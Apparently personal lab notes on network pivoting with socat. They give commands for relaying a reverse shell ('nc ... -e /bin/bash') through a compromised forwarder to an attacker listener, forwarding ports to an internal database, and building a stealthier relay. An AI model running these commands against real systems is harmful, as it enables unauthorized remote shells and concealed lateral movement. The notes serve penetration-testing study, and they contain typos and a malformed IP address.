https://s3-us-west-2.amazonaws.com/secure.notion-static.com/4e388baf-2f0c-449e-bb25-f35aa60292a6/Untitled.png

  1. The socat listens on the public facing machine for a rev shell from internal network, and then forward the rev shell back to our attacker machine.

Steps:

  1. Create nc listener on attacker machine. nc -nvlp 8008.
  2. On the forwader, ./socat tcp-l:34125 tcp:ATTACKERIP:PORT &
  3. execte a rev shell back to our forwarder server nc FORWARDERIP 34125 -e /bin/bash.
  4. Now we should see the rev shell in our ATTACKER MACHINE.

Forwarding our network to the other victim:

  1. On the compromised forwarder. ./socat tcp-l:33060, fork,reuseaddr tcp:172:16.0.10:3306 &. This would route whatever comes into 33060 to 172.16.0.10:3306.
  2. firewall-cmd --zone=public --add-port PORT/tcp
  3. This would be similar to ssh -L 33060:172.16.0.10:3306 [email protected] -fN.

Forwarding Quietly~~~ Shushhhh

  1. Previously we open a new port for forwarding, but this time, we will not.
  2. On our ATTACKER machine, we can run socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &.This would open 2 ports on our ATTACKER machine, port 8001, 8000. This would create a local port relay. So what goes into one of them will come out the other. port 8000 also has fork and reuseaddr option set to allow us to creat more than one connection using this port forward.
  3. So On the compromised relay server ./socat tcp:ATTACKING_IP:8001 tcp:TARGET:TAGET_PORT, fork &. This would make a connection between our listening port 8001 on the attacking machine, and open port of the target server.

Quiet flow